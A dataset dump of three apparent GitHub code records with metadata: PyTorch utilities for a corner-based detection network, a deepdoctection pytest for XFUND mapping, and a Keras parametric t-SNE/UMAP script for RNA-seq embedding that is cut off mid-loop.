for_fg = torch.zeros([4], dtype=torch.int32)\n for_fg[0] = x\n for_fg[1] = y\n for_fg[2] = w\n for_fg[3] = h\n return for_fg\n\n\ndef update_heatmap(fa_new, fm, fg, extract):\n '''\n fa_new是[num_kps, 256, 7, 7]\n fm是[256, 128, 128]\n fg是[num_kps, 4]\n extract是截取区域\n '''\n # 虽然这个empty_fm现在不需要梯度,但是算完之后就要梯度了\n empty_fm = torch.zeros([fm.size(0), fm.size(1), fm.size(2)]).cuda()\n\n for fa_extract, fa_position in zip(fa_new, fg):\n x = fa_position[0]\n y = fa_position[1]\n\n # x轴坐标变换\n if x <= extract // 2:\n x = extract // 2\n elif x + extract // 2 >= fm.size(1) - 1:\n x = fm.size(1) - extract // 2 - 1\n \n # y轴坐标变换\n if y <= extract // 2:\n y = extract // 2\n elif y + extract // 2 >= fm.size(2) - 1:\n y = fm.size(2) - extract // 2 - 1\n\n if extract == 3:\n empty_fm[:, x - 1:x + extract - 1, y - 1:y + extract - 1] = fa_extract\n elif extract == 5:\n empty_fm[:, x - 2:x + extract - 2, y - 2:y + extract - 2] = fa_extract\n else:\n empty_fm[:, x - 3:x + extract - 3, y - 3:y + extract - 3] = fa_extract\n\n empty_fm = empty_fm.detach()\n return empty_fm\n \n \ndef _gather_feat(feat, ind, mask=None):\n dim = feat.size(2)\n ind = ind.unsqueeze(2).expand(ind.size(0), ind.size(1), dim)\n feat = feat.gather(1, ind)\n if mask is not None:\n mask = mask.unsqueeze(2).expand_as(feat)\n feat = feat[mask]\n feat = feat.view(-1, dim)\n return feat\n\ndef _nms(heat, kernel=1):\n pad = (kernel - 1) // 2\n\n hmax = nn.functional.max_pool2d(heat, (kernel, kernel), stride=1, padding=pad)\n keep = (hmax == heat).float()\n return heat * keep\n\ndef _tranpose_and_gather_feat(feat, ind):\n feat = feat.permute(0, 2, 3, 1).contiguous()\n feat = feat.view(feat.size(0), -1, feat.size(3))\n feat = _gather_feat(feat, ind)\n return feat\n\ndef _topk(scores, K=20):\n batch, cat, height, width = scores.size()\n\n topk_scores, topk_inds = torch.topk(scores.view(batch, -1), K)\n\n topk_clses = (topk_inds / (height * width)).int()\n\n topk_inds = topk_inds % (height * width)\n topk_ys = (topk_inds / width).int().float()\n topk_xs = (topk_inds % width).int().float()\n return topk_scores, topk_inds, topk_clses, topk_ys, topk_xs\n\n# 先sigmoid变成响应值,其次nms(maxpooling),找topk\ndef _decode(\n tl_heat, br_heat, tl_tag, br_tag, tl_regr, br_regr, \n K=200, kernel=1, ae_threshold=1, num_dets=1000, no_border=False\n):\n batch, cat, height, width = tl_heat.size()\n\n tl_heat = torch.sigmoid(tl_heat)\n br_heat = torch.sigmoid(br_heat)\n\n # perform nms on heatmaps\n tl_heat = _nms(tl_heat, kernel=kernel)\n br_heat = _nms(br_heat, kernel=kernel)\n\n ## 在top left以及bottom right,找到最大的前K个点,并记录下他们的得分,位置,类别,坐标等信息,下面返回的结果分别代表的是:\n ## 类别得分,位置索引,类别,y坐标,x坐标\n tl_scores, tl_inds, tl_clses, tl_ys, tl_xs = _topk(tl_heat, K=K)\n br_scores, br_inds, br_clses, br_ys, br_xs = _topk(br_heat, K=K)\n\n tl_ys = tl_ys.view(batch, K, 1).expand(batch, K, K)\n tl_xs = tl_xs.view(batch, K, 1).expand(batch, K, K)\n br_ys = br_ys.view(batch, 1, K).expand(batch, K, K)\n br_xs = br_xs.view(batch, 1, K).expand(batch, K, K)\n\n if no_border:\n tl_ys_binds = (tl_ys == 0)\n tl_xs_binds = (tl_xs == 0)\n br_ys_binds = (br_ys == height - 1)\n br_xs_binds = (br_xs == width - 1)\n\n if tl_regr is not None and br_regr is not None:\n tl_regr = _tranpose_and_gather_feat(tl_regr, tl_inds)\n tl_regr = tl_regr.view(batch, K, 1, 2)\n br_regr = _tranpose_and_gather_feat(br_regr, br_inds)\n br_regr = br_regr.view(batch, 1, K, 2)\n\n tl_xs = tl_xs + tl_regr[..., 0]\n tl_ys = tl_ys + tl_regr[..., 1]\n br_xs = br_xs + br_regr[..., 0]\n br_ys = br_ys + br_regr[..., 1]\n\n # all possible boxes based on top k corners (ignoring class)\n bboxes = torch.stack((tl_xs, tl_ys, br_xs, br_ys), dim=3)\n\n tl_tag = _tranpose_and_gather_feat(tl_tag, tl_inds)\n tl_tag = tl_tag.view(batch, K, 1)\n br_tag = _tranpose_and_gather_feat(br_tag, br_inds)\n br_tag = br_tag.view(batch, 1, K)\n dists = torch.abs(tl_tag - br_tag)\n\n tl_scores = tl_scores.view(batch, K, 1).expand(batch, K, K)\n br_scores = br_scores.view(batch, 1, K).expand(batch, K, K)\n scores = (tl_scores + br_scores) / 2\n\n # reject boxes based on classes\n tl_clses = tl_clses.view(batch, K, 1).expand(batch, K, K)\n br_clses = br_clses.view(batch, 1, K).expand(batch, K, K)\n cls_inds = (tl_clses != br_clses)\n\n # reject boxes based on distances\n dist_inds = (dists > ae_threshold)\n\n # reject boxes based on widths and heights\n width_inds = (br_xs < tl_xs)\n height_inds = (br_ys < tl_ys)\n\n if no_border:\n scores[tl_ys_binds] = -1\n scores[tl_xs_binds] = -1\n scores[br_ys_binds] = -1\n scores[br_xs_binds] = -1\n\n scores[cls_inds] = -1\n scores[dist_inds] = -1\n scores[width_inds] = -1\n scores[height_inds] = -1\n\n scores = scores.view(batch, -1)\n scores, inds = torch.topk(scores, num_dets)\n scores = scores.unsqueeze(2)\n\n bboxes = bboxes.view(batch, -1, 4)\n bboxes = _gather_feat(bboxes, inds)\n\n clses = tl_clses.contiguous().view(batch, -1, 1)\n clses = _gather_feat(clses, inds).float()\n\n tl_scores = tl_scores.contiguous().view(batch, -1, 1)\n tl_scores = _gather_feat(tl_scores, inds).float()\n br_scores = br_scores.contiguous().view(batch, -1, 1)\n br_scores = _gather_feat(br_scores, inds).float()\n\n detections = torch.cat([bboxes, scores, tl_scores, br_scores, clses], dim=2)\n return detections\n\nclass upsample(nn.Module):\n def __init__(self, scale_factor):\n super(upsample, self).__init__()\n self.scale_factor = scale_factor\n\n def forward(self, x):\n return nn.functional.interpolate(x, scale_factor=self.scale_factor)\n\nclass merge(nn.Module):\n def forward(self, x, y):\n return x + y\n\nclass convolution(nn.Module):\n def __init__(self, k, inp_dim, out_dim, stride=1, with_bn=True):\n super(convolution, self).__init__()\n\n pad = (k - 1) // 2\n self.conv = nn.Conv2d(inp_dim, out_dim, (k, k), padding=(pad, pad), stride=(stride, stride), bias=not with_bn)\n self.bn = nn.BatchNorm2d(out_dim) if with_bn else nn.Sequential()\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv = self.conv(x)\n bn = self.bn(conv)\n relu = self.relu(bn)\n return relu\n\nclass residual(nn.Module):\n def __init__(self, inp_dim, out_dim, k=3, stride=1):\n super(residual, self).__init__()\n p = (k - 1) // 2\n\n self.conv1 = nn.Conv2d(inp_dim, out_dim, (k, k), padding=(p, p), stride=(stride, stride), bias=False)\n self.bn1 = nn.BatchNorm2d(out_dim)\n self.relu1 = nn.ReLU(inplace=True)\n\n self.conv2 = nn.Conv2d(out_dim, out_dim, (k, k), padding=(p, p), bias=False)\n self.bn2 = nn.BatchNorm2d(out_dim)\n \n self.skip = nn.Sequential(\n nn.Conv2d(inp_dim, out_dim, (1, 1), stride=(stride, stride), bias=False),\n nn.BatchNorm2d(out_dim)\n ) if stride != 1 or inp_dim != out_dim else nn.Sequential()\n self.relu = nn.ReLU(inplace=True)\n\n def forward(self, x):\n conv1 = self.conv1(x)\n bn1 = self.bn1(conv1)\n relu1 = self.relu1(bn1)\n\n conv2 = self.conv2(relu1)\n bn2 = self.bn2(conv2)\n\n skip = self.skip(x)\n return self.relu(bn2 + skip)\n\nclass corner_pool(nn.Module):\n def __init__(self, dim, pool1, pool2):\n super(corner_pool, self).__init__()\n self._init_layers(dim, pool1, pool2)\n\n def _init_layers(self, dim, pool1, pool2):\n self.p1_conv1 = convolution(3, dim, 128)\n self.p2_conv1 = convolution(3, dim, 128)\n\n self.p_conv1 = nn.Conv2d(128, dim, (3, 3), padding=(1, 1), bias=False)\n self.p_bn1 = nn.BatchNorm2d(dim)\n\n self.conv1 = nn.Conv2d(dim, dim, (1, 1), bias=False)\n self.bn1 = nn.BatchNorm2d(dim)\n self.relu1 = nn.ReLU(inplace=True)\n\n self.conv2 = convolution(3, dim, dim)\n\n self.pool1 = pool1()\n self.pool2 = pool2()\n\n def forward(self, x):\n # pool 1\n p1_conv1 = self.p1_conv1(x)\n pool1 = self.pool1(p1_conv1)\n\n # pool 2\n p2_conv1 = self.p2_conv1(x)\n pool2 = self.pool2(p2_conv1)\n\n # pool 1 + pool 2\n p_conv1 = self.p_conv1(pool1 + pool2)\n p_bn1 = self.p_bn1(p_conv1)\n\n conv1 = self.conv1(x)\n bn1 = self.bn1(conv1)\n relu1 = self.relu1(p_bn1 + bn1)\n\n conv2 = self.conv2(relu1)\n return conv2\n", "repo_name": "yujunliuCV/KDNet", "sub_path": "core/models/py_utils/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 12650, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.uint8", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.int32", "line_number": 105, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn.functional.max_pool2d", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.topk", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 233, "usage_type": "call"}, {"api_name": "torch.topk", "line_number": 263, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 280, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 286, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 286, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 286, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 288, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 288, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 292, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 292, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 297, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 297, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 298, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 299, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 307, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 307, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 312, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 313, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 314, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 314, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 316, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 316, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 317, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 319, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 319, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 320, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 320, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 321, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 321, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 322, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 323, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 323, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 336, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 336, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 345, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 345, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 346, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 346, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 348, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 349, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 349, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 350, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 350, "usage_type": "name"}]} +{"seq_id": "12963310263", "text": "from typing import Dict, Mapping\nfrom unittest.mock import MagicMock, patch\n\nfrom pytest import mark\n\nfrom deepdoctection.mapper.xfundstruct import xfund_to_image\nfrom deepdoctection.utils.detection_types import JsonDict\nfrom deepdoctection.utils.settings import CellType, LayoutType, ObjectTypes, TokenClasses, WordType\n\nfrom .conftest import get_always_pubtabnet_white_image\n\n\n@mark.basic\n@patch(\n \"deepdoctection.mapper.xfundstruct.load_image_from_file\", MagicMock(side_effect=get_always_pubtabnet_white_image)\n)\ndef test_xfund_to_image(\n datapoint_xfund: JsonDict,\n xfund_category_dict: Mapping[ObjectTypes, str],\n xfund_category_names: Dict[str, str],\n ner_token_to_id_mapping: JsonDict,\n) -> None:\n \"\"\"\n testing xfund_to_image is mapping correctly\n \"\"\"\n\n # Act\n xfund_to_image_func = xfund_to_image(\n False, False, xfund_category_dict, xfund_category_names, ner_token_to_id_mapping\n )\n img = xfund_to_image_func(datapoint_xfund)\n\n # Assert\n assert img\n word_anns = img.get_annotation(category_names=LayoutType.word)\n words = [ann.get_sub_category(WordType.characters).value for ann in word_anns] # type: ignore\n assert words == [\"Akademisches\", \"Auslandsamt\", \"Bewerbungsformular\"]\n\n sub_cats_category_names = [ann.get_sub_category(WordType.token_class).category_name for ann in word_anns]\n assert sub_cats_category_names == [TokenClasses.other, TokenClasses.other, CellType.header]\n\n sub_cats_ner_tags = [ann.get_sub_category(WordType.tag).category_name for ann in word_anns]\n assert sub_cats_ner_tags == [\"O\", \"O\", \"B\"]\n\n text_anns = img.get_annotation(category_names=LayoutType.text)\n sub_cats_category_names = [ann.get_sub_category(WordType.token_class).category_name for ann in text_anns]\n assert sub_cats_category_names == [TokenClasses.other, TokenClasses.header]\n", "repo_name": "deepdoctection/deepdoctection", "sub_path": "tests/mapper/test_xfundstruct.py", "file_name": "test_xfundstruct.py", "file_ext": "py", "file_size_in_byte": 1857, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1814, "dataset": "github-code", "pt": "52", "api": [{"api_name": "deepdoctection.utils.detection_types.JsonDict", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 19, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.ObjectTypes", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 20, "usage_type": "name"}, {"api_name": "deepdoctection.utils.detection_types.JsonDict", "line_number": 21, "usage_type": "name"}, {"api_name": "deepdoctection.mapper.xfundstruct.xfund_to_image", "line_number": 28, "usage_type": "call"}, {"api_name": "deepdoctection.utils.settings.LayoutType.word", "line_number": 35, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.LayoutType", "line_number": 35, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.characters", "line_number": 36, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 36, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.token_class", "line_number": 39, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 39, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.TokenClasses.other", "line_number": 40, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.TokenClasses", "line_number": 40, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.CellType.header", "line_number": 40, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.CellType", "line_number": 40, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.tag", "line_number": 42, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 42, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.LayoutType.text", "line_number": 45, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.LayoutType", "line_number": 45, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.WordType.token_class", "line_number": 46, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.WordType", "line_number": 46, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.TokenClasses.other", "line_number": 47, "usage_type": "attribute"}, {"api_name": "deepdoctection.utils.settings.TokenClasses", "line_number": 47, "usage_type": "name"}, {"api_name": "deepdoctection.utils.settings.TokenClasses.header", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pytest.mark.basic", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 13, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 14, "usage_type": "call"}, {"api_name": "unittest.mock.MagicMock", "line_number": 15, "usage_type": "call"}, {"api_name": "conftest.get_always_pubtabnet_white_image", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "30790497264", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 4 20:20:02 2021\r\n\r\n@author: Summer\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 16 09:59:11 2020\r\n\r\n@author: Summer\r\n\"\"\"\r\n\r\nimport numpy as np\r\nnp.random.seed(71)\r\n\r\nimport matplotlib\r\nmatplotlib.use('Agg')\r\n#from memory_profiler import profile\r\nfrom keras import backend as K\r\nfrom keras.models import Sequential\r\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\r\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\r\nfrom keras.layers import BatchNormalization,Embedding, Conv1D,Reshape,GlobalAveragePooling1D\r\nfrom keras.optimizers import SGD\r\nfrom keras.callbacks import Callback\r\nfrom keras.utils import np_utils\r\nfrom keras.objectives import categorical_crossentropy\r\nfrom keras.datasets import mnist,fashion_mnist,cifar10,imdb\r\nfrom sklearn.model_selection import train_test_split\r\nimport metrics\r\nimport sklearn\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport copy\r\nfrom sklearn.metrics import classification_report\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import ArtistAnimation\r\nfrom SA_layer import *\r\nfrom umap_utils import *\r\nimport multiprocessing as mp\r\nfrom keras.models import load_model\r\nfrom keras.models import Model\r\nimport gc\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"7\"\r\n\r\n\r\nbatch_size = 2500\r\nlow_dim =2\r\nnb_epoch = 550\r\n\r\nshuffle_interval = nb_epoch + 1\r\n\r\nperplexity = 30.0\r\n\r\nnp.seterr(divide='ignore',invalid='ignore')\r\n\r\ndef Hbeta(D, beta):\r\n P = np.exp(-D * beta)\r\n sumP = np.sum(P)\r\n H = np.log(sumP) + beta * np.sum(D * P) / sumP\r\n P = P / sumP\r\n return H, P\r\n\r\ndef x2p_job(data):\r\n i, Di, tol, logU = data\r\n beta = 1.0\r\n betamin = -np.inf\r\n betamax = np.inf\r\n H, thisP = Hbeta(Di, beta)\r\n Hdiff = 100*tol\r\n# Hdiff = H - logU\r\n tries = 0\r\n # while np.abs(Hdiff) > tol and tries < 50:\r\n while tries < 50:\r\n H, thisP = Hbeta(Di, beta)\r\n Hdiff = H - logU\r\n tries += 1\r\n if Hdiff > 0:\r\n betamin = beta\r\n if betamax == -np.inf:\r\n beta = beta * 2\r\n else:\r\n beta = (betamin + betamax) / 2\r\n else:\r\n betamax = beta\r\n if betamin == -np.inf:\r\n beta = beta / 2\r\n else:\r\n beta = (betamin + betamax) / 2\r\n\r\n return i, thisP\r\n\r\n\r\ndef x2p(X,perplexity):\r\n # tol = 1e-5\r\n tol = 1e-4\r\n n = X.shape[0]\r\n logU = np.log(perplexity)\r\n \r\n sum_X = np.sum(np.square(X), axis=1)\r\n D = sum_X + (sum_X.reshape([-1, 1]) - 2 * np.dot(X, X.T))\r\n\r\n idx = (1 - np.eye(n)).astype(bool)\r\n D = D[idx].reshape([n, -1])\r\n\r\n result=[]\r\n for i in range(n):\r\n data_setin=i, D[i], tol, logU\r\n result1=x2p_job(data_setin)\r\n result.append(result1)\r\n P = np.zeros([n, n])\r\n for i, thisP in result:\r\n P[i, idx[i]] = thisP\r\n return P\r\n\r\n\r\ndef calculate_P(X):\r\n# print (\"Computing pairwise distances...\")\r\n n = X.shape[0]\r\n P = np.zeros([n, batch_size])\r\n for i in range(0, n, batch_size):\r\n P_batch = x2p(X[i:i + batch_size],perplexity)\r\n# print(P_batch)\r\n P_batch[np.isnan(P_batch)] = 0\r\n P_batch = P_batch + P_batch.T\r\n \r\n #exaggerate\r\n P_batch = P_batch*2\r\n \r\n P_batch = P_batch / P_batch.sum()\r\n P_batch = np.maximum(P_batch, 1e-12) \r\n P[i:i + batch_size] = P_batch\r\n return P\r\n\r\ndef CEumap(X, Y):\r\n a=1.929\r\n b=0.7915\r\n sum_Y = K.sum(K.square(Y), axis=1)\r\n eps = K.variable(10e-15)\r\n D = sum_Y + K.reshape(sum_Y, [-1, 1]) - 2 * K.dot(Y, K.transpose(Y))\r\n Q = K.pow(1 + a*D, -(2*b) / 2)\r\n Q *= K.variable(1 - np.eye(batch_size))\r\n Q /= K.sum(Q)\r\n Q = K.maximum(Q, eps) \r\n X /= K.sum(X)\r\n C1 = K.sum(X*K.log((X + eps) / (Q + eps)))\r\n C2 = K.sum((1-X)*K.log(((1-X) + eps) / ((1-Q) + eps)))\r\n C=C1+C2\r\n return C\r\n\r\n\r\ndef cal_matrix_P(X,neighbors):\r\n entropy=np.log(neighbors)\r\n n1,n2=X.shape\r\n D=np.square(sklearn.metrics.pairwise_distances(X))\r\n D_sort=np.argsort(D,axis=1)\r\n P=np.zeros((n1,n1))\r\n for i in range(n1):\r\n Di=D[i,D_sort[i,1:]]\r\n P[i,D_sort[i,1:]]=cal_p(Di,entropy=entropy)\r\n P=(P+np.transpose(P))/(2*n1)\r\n P=np.maximum(P,1e-100)\r\n return P\r\n\r\n\r\ndef cal_p(D,entropy,K=50):\r\n beta=1.0\r\n H=cal_entropy(D,beta)\r\n error=H-entropy\r\n k=0\r\n betamin=-np.inf\r\n betamax=np.inf\r\n while np.abs(error)>1e-4 and k<=K:\r\n if error > 0:\r\n betamin=copy.deepcopy(beta)\r\n if betamax==np.inf:\r\n beta=beta*2\r\n else:\r\n beta=(beta+betamax)/2\r\n else:\r\n betamax=copy.deepcopy(beta)\r\n if betamin==-np.inf:\r\n beta=beta/2\r\n else:\r\n beta=(beta+betamin)/2\r\n H=cal_entropy(D,beta)\r\n error=H-entropy\r\n k+=1\r\n P=np.exp(-D*beta)\r\n P=P/np.sum(P)\r\n return P\r\n\r\n\r\ndef cal_entropy(D,beta):\r\n # P=numpy.exp(-(numpy.sqrt(D))*beta)\r\n P=np.exp(-D*beta)\r\n sumP=sum(P)\r\n sumP=np.maximum(sumP,1e-200)\r\n H=np.log(sumP) + beta * np.sum(D * P) / sumP\r\n return H\r\n\r\ndef KLdivergence(P, Y):\r\n alpha = low_dim - 1.\r\n sum_Y = K.sum(K.square(Y), axis=1)\r\n eps = K.variable(10e-15)\r\n D = sum_Y + K.reshape(sum_Y, [-1, 1]) - 2 * K.dot(Y, K.transpose(Y))\r\n Q = K.pow(1 + D / alpha, -(alpha + 1) / 2)\r\n Q *= K.variable(1 - np.eye(batch_size))\r\n Q /= K.sum(Q)\r\n Q = K.maximum(Q, eps)\r\n C = K.log((P + eps) / (Q + eps))\r\n C = K.sum(P * C)\r\n return C\r\n\r\n\r\nprint (\"load data\")\r\n# # RNA-SEQ\r\n#X_train1=np.load('E:/RNA_SEQ/X.npy')\r\nX_train1=np.load('/.../data/X.npy')\r\nX_train=X_train1[0:22500]\r\n#color=np.load('E:/RNA_SEQ/color.npy')\r\ncolor1=np.load('/.../data/color.npy')\r\ncolor1=color1[0:22500]\r\ncolor2=np.load('/.../data/color_class.npy')\r\ncolor2=color2[0:22500]\r\nn=22500\r\nchannel=1\r\nbatch_num = int(n // batch_size)\r\nm = batch_num * batch_size\r\n\r\n\r\nmodel = Sequential()\r\n\r\n## vector-based model\r\nmodel.add(Dense(500, input_shape=(X_train.shape[1],)))\r\nmodel.add(Activation('relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(500))\r\nmodel.add(Activation('relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(500))\r\nmodel.add(Activation('relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(2000))\r\nmodel.add(Activation('relu',name='Dense1'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(500))\r\nmodel.add(Activation('relu',name='Dense2'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dense(100))\r\nmodel.add(Activation('relu',name='Dense3'))\r\nmodel.add(BatchNormalization())\r\n#model.add(Dense(50))\r\n#model.add(Activation('relu'))\r\nmodel.add(Dense(2))\r\n\r\n\r\nmodel.compile(loss=KLdivergence, optimizer=\"adam\")\r\n\r\n \r\nprint (\"fit\")\r\nimages = []\r\nfig = plt.figure(figsize=(5, 5))\r\nloss_record=[]\r\nfor epoch in range(nb_epoch):\r\n ## shuffle X_train and calculate P in different recursions \r\n if epoch % shuffle_interval == 0:\r\n\r\n X = X_train\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(X[i:i+batch_size],30)\r\n low_para1=calculate_P(X[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==150: \r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense1').output)\r\n low_para_model_ouput = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(low_para_model_ouput[i:i+batch_size],30)\r\n low_para1=calculate_P(low_para_model_ouput[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==250: \r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense2').output)\r\n low_para_model_ouput = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(low_para_model_ouput[i:i+batch_size],30)\r\n low_para1=calculate_P(low_para_model_ouput[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==350: \r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense3').output)\r\n low_para_model_ouput = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n# low_para1=cal_matrix_P(low_para_model_ouput[i:i+batch_size],30)\r\n low_para1=calculate_P(low_para_model_ouput[i:i+batch_size])\r\n low_para.append(low_para1)\r\n if epoch==450: \r\n \r\n model.compile(loss=CEumap, optimizer=\"adam\")\r\n low_para_model = Model(inputs=model.input,outputs=model.get_layer('Dense3').output)\r\n X1 = low_para_model.predict(X_train)\r\n low_para=[]\r\n for i in range(0, n, batch_size):\r\n test_hv=hd_v(X1[i:i+batch_size])\r\n low_para1=test_hv.toarray()\r\n low_para.append(low_para1)\r\n\r\n\r\n # train\r\n\r\n loss=0\r\n temp_lp=0\r\n for i in range(0, n, batch_size):\r\n low_para_temp1=low_para[temp_lp]\r\n loss += model.train_on_batch(X_train[i:i+batch_size], low_para_temp1)\r\n temp_lp=temp_lp+1\r\n loss_record.append(loss / batch_num)\r\n print (\"Epoch: {}/{}, loss: {}\".format(epoch+1, nb_epoch, loss / batch_num))\r\n if epoch==149:\r\n plt.clf()\r\n fig = plt.figure(figsize=(5, 5)) \r\n pred1 = model.predict(X_train)\r\n plt.scatter(pred1[:, 0], pred1[:, 1], marker='o', s=0.5, color=color1[0:22500])\r\n fig.tight_layout()\r\n 